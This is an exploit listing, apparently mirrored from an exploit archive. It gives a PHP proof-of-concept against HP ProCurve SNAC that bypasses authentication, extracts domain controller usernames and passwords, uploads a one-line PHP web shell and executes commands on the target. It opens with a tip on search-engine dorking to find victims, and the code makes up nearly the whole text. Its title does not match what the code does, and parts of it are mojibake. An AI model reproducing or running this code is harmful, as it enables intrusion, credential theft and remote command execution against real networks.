Share
## https://sploitus.com/exploit?id=PACKETSTORM:213289
=============================================================================================================================================
    | # Title     : HP ProCurve SNAC Domain Controller PHP Code Injection Vulnerability                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: Exploiting an authentication bypass vulnerability to obtain Domain Controller Credentials in HP ProCurve SNAC.
    	
    	( https://packetstorm.news/files/id/180690/ )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 129
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class HPSNACExploit {
        private $target;
        private $port;
        private $cookie;
    
        public function __construct($target, $port = 443) {
            $this->target = $target;
            $this->port = $port;
        }
    
        private function sendRequest($url, $useCookie = false) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$url");
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            
            if ($useCookie && $this->cookie) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: {$this->cookie}"]);
            }
            
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        public function getSession() {
            $response = $this->sendRequest("/RegWeb/html/snac/index.html");
            preg_match('/Set-Cookie: (.*?);/', $response, $matches);
            
            if (!empty($matches[1])) {
                $this->cookie = $matches[1];
                return true;
            }
            return false;
        }
    
        public function getDomainInfo() {
            return $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", true);
        }
    
        public function parseDomainData($data) {
            $xml = simplexml_load_string($data);
            $results = [];
            
            foreach ($xml->Controllers->Domain as $domain) {
                $results[] = [
                    'dc_ip' => (string)$domain->domainControllerIP,
                    'port' => (string)$domain->port,
                    'service' => (string)$domain->connType,
                    'user' => (string)$domain->userName,
                    'password' => (string)$domain->password
                ];
            }
            return $results;
        }
    
        public function uploadShell() {
            $shellContent = "<?php system(\$_GET['cmd']); ?>";
            $uploadUrl = "/RegWeb/uploads/shell.php";
            
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$uploadUrl");
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, ["file" => $shellContent]);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            
            $response = curl_exec($ch);
            curl_close($ch);
            
            if (strpos($response, "success") !== false) {
                echo "[+] Web shell uploaded successfully: https://{$this->target}/RegWeb/uploads/shell.php?cmd=whoami\n";
            } else {
                echo "[-] Failed to upload web shell.\n";
            }
        }
    
        public function executeCommand($cmd) {
            $url = "/RegWeb/RegWeb/ExecuteCommandServlet?cmd=" . urlencode($cmd);
            $response = $this->sendRequest($url, true);
            echo "[+] Command Output: \n$response\n";
        }
    
        public function exploit() {
            echo "[*] Trying to get session...\n";
            if (!$this->getSession()) {
                echo "[-] Failed to get a valid session.\n";
                return;
            }
            
            echo "[*] Exploiting authentication bypass...\n";
            $domainInfo = $this->getDomainInfo();
            
            if (!$domainInfo || strpos($domainInfo, 'domainName') === false) {
                echo "[-] Target is not vulnerable.\n";
                return;
            }
            
            echo "[*] Uploading web shell...\n";
            $this->uploadShell();
            
            echo "[*] Executing command: whoami\n";
            $this->executeCommand("whoami");
            
            echo "[*] Parsing domain controller credentials...\n";
            $credentials = $this->parseDomainData($domainInfo);
            
            if (empty($credentials)) {
                echo "[!] No domain controllers found.\n";
                return;
            }
            
            echo "\nDomain Controllers Credentials:\n";
            echo "-------------------------------------\n";
            foreach ($credentials as $cred) {
                echo "DC IP: {$cred['dc_ip']}\n";
                echo "Username: {$cred['user']}\n";
                echo "Password: {$cred['password']}\n";
                echo "-------------------------------------\n";
            }
        }
    }
    
    // Usage example
    $target = "192.168.1.1"; // ุงุณุชุจุฏู„ ุจุนู†ูˆุงู† IP ุงู„ู‡ุฏู
    $exploit = new HPSNACExploit($target);
    $exploit->exploit();
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================